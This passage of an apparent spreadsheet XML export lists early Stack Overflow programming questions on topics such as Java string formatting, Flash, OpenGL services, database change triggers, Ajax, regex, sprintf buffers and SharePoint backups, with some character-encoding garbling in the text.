   content: " (" attr(href) ") ";
   font-size: 90%;
   }
#content a[href^="/"]:after {
   content: " (http://www.alistapart.com" attr(href) ") ";
   }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Do not understand why - does anyone have any suggestions to correct the output of this print.css?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I use Java's String.format() if performance is important?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have to build Strings all the time for log output and so on. Over the JDK versions we have learned when to use &lt;code&gt;StringBuffer&lt;/code&gt; (many appends, thread safe) and &lt;code&gt;StringBuilder&lt;/code&gt; (many appends, non-thread-safe).&lt;/p&gt;
&lt;p&gt;What's the advice on using &lt;code&gt;String.format()&lt;/code&gt;? Is it efficient, or are we forced to stick with concatenation for one-liners where performance is important?&lt;/p&gt;
&lt;p&gt;e.g. ugly old style,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String s = "What do you get if you multiply " + varSix + " by " + varNine + "?");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;vs. tidy new style (and possibly slow),&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String s = String.format("What do you get if you multiply %d by %d?", varSix, varNine);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note: my specific use case is the hundreds of 'one-liner' log strings throughout my code. They don't involve a loop, so &lt;code&gt;StringBuilder&lt;/code&gt; is too heavyweight. I'm interested in &lt;code&gt;String.format()&lt;/code&gt; specifically.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Non-working alpha in Flash Player 6 [Given Up On]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a flash project that due to requirements has to be backward compatible with flash 6. Everything works, except the first 6 (of 17) jpeg images that are loaded by &amp;lt;MovieClip&gt;.loadMovie don't respond to changes to their alpha setting.&lt;/p&gt;
&lt;p&gt;If I rearrange the order of the images in the XML file that is used to provide the image urls to the flash movie, the new first six images fail to respond to alpha and the old six will respond to alpha.&lt;/p&gt;
&lt;p&gt;Any ideas as to what might be the cause?&lt;/p&gt;
&lt;p&gt;Edit:
I had added code to try and wait for the images to load completely first using onClipEvent(data). The images appear to pre-load before the animation starts but the alpha property still doesn't work.&lt;/p&gt;
&lt;p&gt;Edit 2:
I justed used a wipe type transition instead of a fade. I hope to never have to use flash 6 again.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Offscreen rendering to a texture in a win32 service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a C++ windows service that can render to a texture. I've got the code working as a regular console app, but when run as a service &lt;code&gt;wglGetProcAddress()&lt;/code&gt; returns NULL.&lt;/p&gt;
&lt;p&gt;Can anyone tell me if this is possible, and if so, what do I need to do to make OpenGL work inside a service process? &lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h3&gt;Edit:&lt;/h3&gt;
&lt;p&gt;I still haven't got this to work under Vista, but it does work under XP.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>vbscript: test for existence of a column in a recordset</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Bah, vbscript. &lt;/p&gt;
&lt;p&gt;I'm trying to figure out how to get this statement to work: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (not rsObject("columnNameThatDoesntExist") is nothing) then 
' do some stuff
end if
' else do nothin
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where rsObject is a RecordSet and columnNameThatDoesntExist is ... well you know. I'm looking for something like rsObject.Columns.Contains(string). But of course can't find it. &lt;/p&gt;
&lt;p&gt;Edit: Looks like looping rsObject.Fields is an option, is that the only way to do this? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to access an iframe's window object from the canvas in FBJS? (facebook)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From the facebook canvas, I need to be able to access an iframe window.  Normally you could do this with window.frames, but FJBS doesn't seem to allow access to the window object.&lt;/p&gt;
&lt;p&gt;Has anyone figured out how to access window objects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi Prism / VS 2008: Switching from code to design with one key?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used several Versions of the Delphi IDE for many years. When I'm using Delphi Prism, I have to deal with Visual Studio - in my case especially VS 2008. &lt;/p&gt;
&lt;p&gt;One of the most annoying things to me is that I have to right-click on my form to switch to the code editor and vice versa. In Delphi, one could simply press the &lt;kbd&gt;F12&lt;/kbd&gt; key to switch between code and form designer. &lt;/p&gt;
&lt;p&gt;Is there a way to let this shortcut work in Visual Studio? It seems to me that I at least need 2 shortcuts when I take a look at the Keyboard options.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Some data changes in the database. How can I trigger some C# code doing some work upon these changes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose I have some application A with a database. Now I want to add another application B, which should keep track of the database changes of application A. Application B should do some calculations, when data has changed. There is no direct communication between both applications. Both can only see the database.&lt;/p&gt;
&lt;p&gt;The basic problem is: Some data changes in the database. How can I trigger some C# code doing some work upon these changes?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;To give some stimulus for answers, I mention some approaches, which I am currently considering:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Make application B polling for
changes in the tables of interest.
Advantage: Simple approach.
Disadvantage: Lots of traffic,
especially when many tables are
involved.&lt;/li&gt;
&lt;li&gt;Introduce triggers, which will fire
on certain events. When they fire
they should write some entry into an
â€œevent tableâ€. Application B only
needs to poll that â€œevent tableâ€.
Advantage: Less traffic.
Disadvantage: Logic is placed into
the database in the form of triggers.
(Itâ€™s not a question of the
â€œevilnessâ€ of triggers. Itâ€™s a design
question, which makes it a
disadvantage.)&lt;/li&gt;
&lt;li&gt;Get rid of the polling approach and
use SqlDependency class to get
notified for changes. Advantage:
(Maybe?) Less traffic than polling
approach. Disadvantage: Not database
independent. (I am aware of
OracleDependency in ODP.NET, but what
about the other databases?)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What approach is more favorable? Maybe I have missed some major (dis)advantage in the mentioned approaches? Maybe there are some other approaches I havenâ€™t think of?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit 1: Database independency is a factor for the ... let's call them ... "sales people". I can use SqlDependency or OracleDependency. For DB2 or other databases I can fall back to the polling approach. It's just a question of cost and benefit, which I want to at least to think about so I can discuss it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you work around the re-sending of the http referrer data on refresh in php?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a IN/OUT ratio hit counting system on my site. When a user is sent to my site, I grab the referrer, strip the domain, look up the domain and +1 to hits_in. Very simple. What I discovered thou is, if a user refreshes the page, the referrer is resent to the site, and it counts it as another +1. Whats even worse is that if user clicks on some link on the site, and then hits BACK to go to the original page, the referrer is resent, and it counts as another +1. So if a foreign site sends me 1 user, who clicks on a video link, views the video, hits BACK in his browser, and then does this 3 times, it will count as if a site sent me 4 users when in fact its just 1.&lt;/p&gt;
&lt;p&gt;Any way I could prevent the 2 examples from happening without actually logging all IPs and checking access times for each IP before doing the +1. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do I understand Ajax correctly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm been reading up on Ajax and would like to see from the stackoverflow community if I'm understanding everything correctly.&lt;/p&gt;
&lt;p&gt;So the normal client server interaction is a user pulls up a web browser types in a url and a HTTP request is sent to the server requesting the page and resources( css, pics ) from the web server. The web server responds to the client via HTTP the page/resources requested and the browser renders the html/JavaScript for the user to view the page.&lt;/p&gt;
&lt;p&gt;1) So would it be safe to say that XMLHttpRequest( XHR ) object is doing the same process as the browser except your not requesting html from the server, your requesting text in some type of format?&lt;/p&gt;
&lt;p&gt;2) Is it true that a XHR object is much like a regular object that can be manipulated by the program creating the object( like a normal object ), but also sends and receives data with another program( web server ) via HTTP? &lt;/p&gt;
&lt;p&gt;3) So in my mind when a XHR is created it is loaded into memory and we setup some of the objects arguments when we do the request.open(â€œGETâ€, url, true). Once we do  a request.send(null) the object basically attempts to â€œGETâ€ the url via HTTP and once we get the data back from the server it is put in the responseText argument. Am I understanding this correctly?&lt;/p&gt;
&lt;p&gt;4) Also synchronous vs asynchronous. When I think of synchronous I think of steps having to be followed in order. For example, I push a button, data gets sent to server, and I have to wait for data to come back before I can do anything else. With asynchronous connections I would push button, data gets sent to server, I do what ever I want while data gets sent back. Is this a good analogy?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I avoid the bluish border when clicking a HyperlinkButton in Silverlight?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Silverlight menu for my application with an image as the background. I use some empty HyperlinkButton at a specific position and size to simulate a real button on the image (think as a HTML image-map):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;HyperlinkButton x:Name="Portfolio" Width="86" Height="40" Canvas.Top="50" NavigateUri="/portfolio"/&amp;gt;
&amp;lt;HyperlinkButton x:Name="Analysis" Width="79" Height="40" Canvas.Top="50" Canvas.Left="124" NavigateUri="/analysis" BorderThickness="0"/&amp;gt;
&amp;lt;HyperlinkButton x:Name="News" Width="77" Height="40" Canvas.Top="50" Canvas.Left="240"  NavigateUri="/news"/&amp;gt;
&amp;lt;HyperlinkButton x:Name="Questions" Width="80" Height="40" Canvas.Top="50" Canvas.Left="357" NavigateUri="/questions"/&amp;gt;
&amp;lt;HyperlinkButton x:Name="Companies" Width="80" Height="40" Canvas.Top="50" Canvas.Left="477" NavigateUri="/companies"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is when I click these buttons it shows a bluish border corresponding to the hyperlink button area during the click event. There is a way I can avoid showing that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Webforms App Layout Opinions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a very simple webforms app that will allow field techs to order parts from the warehouse.&lt;br /&gt;
Essentially it work like so:&lt;br /&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;User selects a category from a filter dropdown, which then binds items of that category to a gridview control&lt;br /&gt;
&lt;li&gt;User finds an item in the gridview and inputs a desired quantity (in a text box in a template field in each row)&lt;br /&gt;
&lt;li&gt;User repeats 1 &amp; 2 as needed&lt;br /&gt;
&lt;li&gt;User sees a summary of the complete requisition&lt;br /&gt;
&lt;li&gt;User confirms items and submits the requisition for processing
&lt;/ol&gt;
&lt;p&gt;My no-brainer UI design so far is the generic dropdown-above-a-gridview where there's a category drop-down list that filters a gridview, like in the eye-catching asp.net ado tutorials:&lt;/p&gt;
&lt;p&gt;Â Â Â Â &lt;img src="http://static.asp.net/asp.net/images/dataaccess/15fig01vb.png" width="500" height="350"&gt;&lt;/p&gt;
&lt;p&gt;Each gridview row (in my app, not in the image above) lists an item's details and can accept a quantity input in the template textbox if the user wants to requisition that item.&lt;/p&gt;
&lt;p&gt;Given that a user will want items from different categories during a single usage session, I'm trying to figure out a good, user-friendly way to allow users to input a quantity for an item, have a warm fuzzy feeling that their input has been accepted/stored, then change the category filter (thus binding the gridview to a different set of data) and select other items from the gridview as many times as necessary before summing up their order and submitting it.&lt;/p&gt;
&lt;p&gt;I've thought about putting another grid below the first and adding items to it dynamically as the user selects each item.  But that seems awkward.  Ditto with an unordered list or similar simple structure under the grid.&lt;/p&gt;
&lt;p&gt;I've also thought about just storing the user's picks in view state or session state and displaying a summary on another page, kind of like a shopping cart sort of functionality.  Maybe do that and use some sort of ajaxy goodness on the main page to display something warm and fuzzy when a quantity is input?&lt;/p&gt;
&lt;p&gt;WWYD?  What Would You Do?&lt;/p&gt;
&lt;p&gt;TIA.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTML document to PDF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got an ASP.NET web page that is a dynamically generated report. For business reasons, this exact report needs to be produced as a PDF. What's the best way to do this? Setting the selected printer to Adobe PDF is not an option.&lt;/p&gt;
&lt;p&gt;Learn to programmatically create PDFs from scratch? Is there a way to render it in some browser control, then save the ouput?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web server config - shttpd/Mongoose</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://code.google.com/p/mongoose/" rel="nofollow"&gt;http://code.google.com/p/mongoose/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://shttpd.sourceforge.net/shttpd.1.txt" rel="nofollow"&gt;http://shttpd.sourceforge.net/shttpd.1.txt&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Trying to configure the lightweight web server shttpd now called mongoose to execute CGI scripts in C.  &lt;/p&gt;
&lt;p&gt;Does it need a seperate CGI interpreter for C?  &lt;/p&gt;
&lt;p&gt;A download of shttpd on source forge had separate interpreter exe for perl and php cgi but not sure if that means I need one in C...  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parse filter expression using RegEx</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a query filter written in human readable language. I need to parse it and convert to the SQL where clause. Examples are:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CustomerName Starts With 'J'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;becomes&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CustomerName LIKE 'J%'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CustomerName Includes 'Smi'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;becomes&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CustomerName LIKE '%Smi%'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The full expression to be parsed may be much more complicated such as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CustomerName Starts With 'J' AND State = 'CA'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;should become&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CustomerName LIKE 'J%' AND State = 'CA'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the best way to go about this? Can it be done easily with RegEx (I am not a regex expert).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In an Atom feed is it ok to change the "updated" field when an entry has its content changed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If an Entry represents some file/resource that has changed - is it enough to change the updated field? I note that most feed readers won't show it as "new" as it has the same UUID? &lt;/p&gt;
&lt;p&gt;rfc4287 says that I can change it, but feed readers seem to ignore it. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to validate numeric input C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to know how to limit an input value to signed decimals using &lt;code&gt;std::cin&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to leave URL parameters unescaped in ASP.NET MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've noticed the returnurl URL parameter on the Stackoverflow login/logout links are not escaped but when I try to add path as a parameter to a route it gets escaped.&lt;/p&gt;
&lt;p&gt;So /login?returnurl=/questions/ask shows /login?returnurl=%2fquestions%2fask and it's kind of ugly.  How do I get it to not escape the returnurl value?&lt;/p&gt;
&lt;p&gt;Here's what I'm doing in the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Html.ActionLink("Login", "Login", "Account", new { returnurl=Request.Path }, null)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>RegEx: HTML whitelist</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Being weak on regular expressions, I've been working with them to improve.  One concept I've been trying to do is to remove all HTML elements except for a list of allowed ones.&lt;/p&gt;
&lt;p&gt;I've managed to do the reverse -- remove a specified list of elements:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;\/?(strong|em|a)[^&amp;gt;]*&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However I want the opposite, and remove every element but.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>struts2 problem in action</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've started an application using struts 2.0.14 and web server is apache tomcat 6.0. 
I am getting an error, please help me to solve this.&lt;/p&gt;
&lt;p&gt;Application name: &lt;strong&gt;strutsTest&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Welcome page: &lt;strong&gt;EmpDetails.jsp&lt;/strong&gt; in a package named â€˜&lt;strong&gt;validTest&lt;/strong&gt;â€™ having action like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;s:form action="takeAction" method="post&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Action class: Employee.java and also I wrote Employee-validation.xml.&lt;/p&gt;
&lt;p&gt;Now when I run my application it opens with following url: &lt;code&gt;http://localhost:8080/strutsTest/validTest/empDetails.jsp&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;There is only textbox in empDetails.jsp named email and I am validating this textbox using employee-validation.xml
To test this I entered an invalid email and got an error message on the top of same welcome page (empDetails.jsp). But this url changed to: 
&lt;code&gt;http://localhost:8080/strutsTest/validTest/takeAction.action&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Not an issue. Now, I entered valid email and submit but got an error message instead of next page i.e thanks.jsp and url has changed to - &lt;/p&gt;
&lt;p&gt;&lt;code&gt;http://localhost:8080/strutsTest/takeAction.action&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Error is:&lt;/p&gt;
&lt;pre&gt;
HTTP Status 404 - /strutsTest/thanks.jsp
type Status report
message  /strutsTest/thanks.jsp
description The requested resource (/simpleStruts2.0.14/thanks.jsp) is not available.
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there any way to determine how many characters will be written by sprintf?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working in C++.&lt;/p&gt;
&lt;p&gt;I want to write a potentially very long formatted string using sprintf (specifically a secure counted version like _snprintf_s, but the idea is the same).  The approximate length is unknown at compile time so I'll have to use some dynamically allocated memory rather than relying on a big static buffer.  Is there any way to determine how many characters will be needed for a particular sprintf call so I can always be sure I've got a big enough buffer?&lt;/p&gt;
&lt;p&gt;My fallback is I'll just take the length of the format string, double it, and try that.  If it works, great, if it doesn't I'll just double the size of the buffer and try again.  Repeat until it fits.  Not exactly the cleverest solution.&lt;/p&gt;
&lt;p&gt;It looks like C99 supports passing NULL to snprintf to get the length.  I suppose I could create a module to wrap that functionality if nothing else, but I'm not crazy about that idea.&lt;/p&gt;
&lt;p&gt;Maybe an fprintf to "/dev/null"/"nul" might work instead?  Any other ideas?&lt;/p&gt;
&lt;p&gt;EDIT: Alternatively, is there any way to "chunk" the sprintf so it picks up mid-write?  If that's possible it could fill the buffer, process it, then start refilling from where it left off.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to generate a DLL file from Visual Studio Express without explicitly creating a DLL project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to generate a DLL file from Visual Studio Express without explicitly creating a DLL project?&lt;/p&gt;
&lt;p&gt;EDIT:
Maybe my thinking process has gone astray on me, but I am trying to setup NUnit, and thought is needed a dll to run it...  Please correct me if I am wrong.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are Concurrent SQL inserts into the same table transactionally safe?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple table in MySql whose raison-d'Ãªtre is to store logs.
The table has an autoincremented sequence and all the other columns has zero referential integrity to other tables. There are no unique keys or indexes on any columns. The column with autoincrement is the primary key.&lt;/p&gt;
&lt;p&gt;Will concurrent INSERTs ever interfere with each other ? I define &lt;strong&gt;interference&lt;/strong&gt; to mean losing data.&lt;/p&gt;
&lt;p&gt;I am using autocommit=true for this insert.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What copy protection technique do you use?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm thinking about adding some kind of copy protection to one of my tools. &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Do you have any experience with that?&lt;/li&gt;
&lt;li&gt;Have you developed your own protection techniques or did you buy 3rd party software?&lt;/li&gt;
&lt;li&gt;Do you think it is a viable method to increase sales? (In a private and/or corporate environment)&lt;/li&gt;
&lt;li&gt;What do you do to prevent hassling your paying customers? In most cases it's the &lt;em&gt;paying&lt;/em&gt; customers who suffer from a bad copy protection, and I don't want this to happen to my customers. (Even if that means accepting some freeloaders)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm especially interested in techniques which allow a trial or freeware version of your software for private use but limit the usefulness in a corporate environment.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Related Question&lt;/strong&gt;: &lt;a href="http://stackoverflow.com/questions/109997/how-do-you-protect-your-software-from-illegal-distribution"&gt;How do you protect your software from illegal distribution&lt;/a&gt;&lt;br /&gt;
&lt;strong&gt;Related Question&lt;/strong&gt;: &lt;a href="http://stackoverflow.com/questions/506282/protect-net-code-from-reverse-engineering/"&gt;Protect .NET code from reverse engineering.&lt;/a&gt;&lt;br /&gt;
&lt;strong&gt;Related Question&lt;/strong&gt;: &lt;a href="http://stackoverflow.com/questions/203229/preventing-the-circumvention-of-copy-protection"&gt;Prevent the circumvention of copy protection.&lt;/a&gt;  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>DAM Solutions for full-length movies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any DAM (Digital Asset Management) solutions in the market that can handle storage &amp;amp; classification of full length movies (10 GB and greater). 
Have heard of solutions from EMC Documentum, Artesia, Oracle UCM and the like but not sure if they handle file sizes this large ? Any open-source systems ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does GCC look at private constructors when matching functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm very busy write now debugging some code, so I can't cookup a complete example, but this basically describes my problem &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Base{};
class MyX:public Base
{
  ...
};
class Derived:Base
{
  ...
};
template&amp;lt;class X&amp;gt;
class MyClass:Derived
{
private:
   MyClass(const MyClass&amp;amp; )
     :x()
   {}
public:
   MyClass(const X&amp;amp; value)
    :x(value)
   {}
};
....
MyX      x;
MyClass&amp;lt;MyX&amp;gt;(x);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This gives me an error like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error: there are two possible constrcutors MyClass&amp;lt;X&amp;gt;(const MyClass&amp;lt;X&amp;gt;&amp;amp;) and MyClass&amp;lt;X&amp;gt;(const X&amp;amp;)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Selenium Grid + Maven 2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a good tutorial or does anyone have experience with setting this up ?
I have a Testsuite.html which launches my tests in one browser atm. This is done in the integration-test lifecycle by the maven selenium plugin. I want to run my tests on multiple browsers. I couldn't find any documentation about selenium grid + maven. I hope somebody can help me.&lt;/p&gt;
&lt;p&gt;Thanks in advance, kukudas&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open Source license that requires giving credit in user's web site</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this small code library that I'm considering releasing into Open Source. I want to release it under something similar to MIT License, i.e. no significant restrictions, however I would like to require that if you use my library on your servers, you have to give me credit on your website.&lt;/p&gt;
&lt;p&gt;Basically, I want a license which is to MIT License as AGPL is to GPL.&lt;/p&gt;
&lt;p&gt;Does something like this exist, or do I have to write my own?&lt;/p&gt;
&lt;p&gt;Or is this just a Really Bad Idea?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: I guess I should have left out the "write my own" part. I'm not a lawyer, and I don't want to pay one. I just thought it would be nice to be able to tell if someone's using my lib with a simple Google search.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AJAX.NET request handlers - set hidden field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to set the value of a hiddenfield control in an AJAX initialize request handler. However on the server the hidden field control always contains the value for the previous postback. I presume the viewstate is being prepared / send before I set the hidden field in the initialize request handler.
Is there any way to set the hidden field so that is passes the new value through or perhaps pass a value to the server via another mechanism.&lt;/p&gt;
&lt;p&gt;This is the code I'm using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var prm = Sys.WebForms.PageRequestManager.getInstance();
prm.add_initializeRequest(MyPage_initializeRequestHandler);
function MyPage_initializeRequestHandler(sender, args)
{
	var hiddenField1= $get('hiddenField1');
	if (hiddenField1 != null)
	{
		hiddenField1.value = 'test';
	}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Many thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you deploy a website to your webservers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At my company we have a group of 8 web developers for our business web site (entirely written in PHP, but that shouldn't matter). Everyone in the group is working on different projects at the same time and whenever they're done with their task, they immediately deploy it (cause business is moving fast these days). &lt;/p&gt;
&lt;p&gt;Currently the development happens on one shared server with all developers working on the same code base (using RCS to "lock" files away from others). When deployment is due, the changed files are copied over to a "staging" server and then a sync script uploads the files to our main webserver from where it is distributed over to the other 9 servers.&lt;/p&gt;
&lt;p&gt;Quite happily, the web dev team asked us for help in order to improve the process (after us complaining for a while) and now our idea for setting up their dev environment is as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A dev server with virtual directories, so that everybody has their own codebase, &lt;/li&gt;
&lt;li&gt;SVN (or any other VCS) to keep track of changes&lt;/li&gt;
&lt;li&gt;a central server for testing holding the latest checked in code&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The question is now: How do we manage to deploy the changed files on to the server without accidentaly uploading bugs from other projects? My first idea was to simply export the latest revision from the repository, but that would not give full control over the files.&lt;/p&gt;
&lt;p&gt;How do you manage such a situation? What kind of deployment scripts do you have in action? &lt;/p&gt;
&lt;p&gt;(As a special challenge: the website has organically grown over the last 10 years, so the projects are not split up in small chunks, but files for one specific feature are spread all over the directory tree.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DependancyProperty attach to a property of a property</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a workflow with a property in it, declared like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Person userAccount {get;set;}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Person is a class with it's own properties (like Person.Name) and with WF I can bind to the userAccount property fine yet I can't seem to bind to the userAccount.Name.&lt;/p&gt;
&lt;p&gt;Is it possible to do this? If so what do I need to change? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does The Same Stylesheet Get Loaded Multiple Times On Different Pages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work on a large Intranet system - as it is an evolved system which started over ten years ago unfortunately the design of it isn't great and needs to be completely rewritten as it currently works by using frames.&lt;/p&gt;
&lt;p&gt;The problem with the frame-based layout is that there's a "main" section which does the includes for the stylesheets.  This is quite a simple question, but I've never found any evidence of it.  Does that same stylesheet get loaded multiple times because it's on separate web pages? Or does the browser cache it and do a comparison check against same-named stylesheets.  Is this the same for JavaScript libraries?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to set up headers and libraries for Linux development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently set up, for a learning exercise, an Ubuntu desktop PC with KDE 4.2, installed Eclipse and started to look for information on how to develop for KDE. I know there's KDevelop and will probably have a look at that at some time in the future. Right now, however, I don't have the correct headers and libraries for creating KDE applications in C/C++ using Eclipse. If I have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;kapplication.h&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it fails to compile since there are dependancies on other header files that are not present on my hard disk or reference classes that aren't declared anywhere.&lt;/p&gt;
&lt;p&gt;So, the question is, what packages do I need to install in order to have the correct set of headers to allow me to write applications for KDE 4.2? Are there any packages I shouldn't have? Alternatively, if there are no packages then where can I get the appropriate files?&lt;/p&gt;
&lt;p&gt;As a corollary, are there any good tutorials on KDE development, something like the Petzold Windows book?&lt;/p&gt;
&lt;p&gt;EDIT: Clarifying what I'm really after: where can I download the correct set of header files / libraries in order to build a KDE application? IDEs to compile code aren't a real problem and are easy to get, as is setting up compiler options for include search paths and so on. Does the KDevelop package have all the correct include and library files or are they separate? I guess they are separate as KDevelop is an IDE that can do other languages as well, but I'm probably wrong. So, the KDE/Qt header files I have don't work, where do I get the right ones?&lt;/p&gt;
&lt;p&gt;Skizz&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Backup/Restore Shared Services Provider on SharePoint MOSS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having serious issues with backing up and restoring a shared services provider.&lt;/p&gt;
&lt;p&gt;Using the Central Administration backup I run the backup to s:\&lt;/p&gt;
&lt;p&gt;This completes fine.&lt;/p&gt;
&lt;p&gt;I then from another SharePoint Server choose to restore a backup and point it to the UNC path \machineipaddress\s$\spbr00DF&lt;/p&gt;
&lt;p&gt;I have given everyone full access to s:\ on the source server.&lt;/p&gt;
&lt;p&gt;All I get back from SharePoint is this:&lt;/p&gt;
&lt;p&gt;Directory \machineipaddress\s$\spbr00DF does not exist or the SQL Server service account and the BI_WEB\Administrator service account do not have permission to read or write to the backup folder. Specify a different directory.&lt;/p&gt;
&lt;p&gt;Would appreciate anyones thoughts on this.&lt;/p&gt;
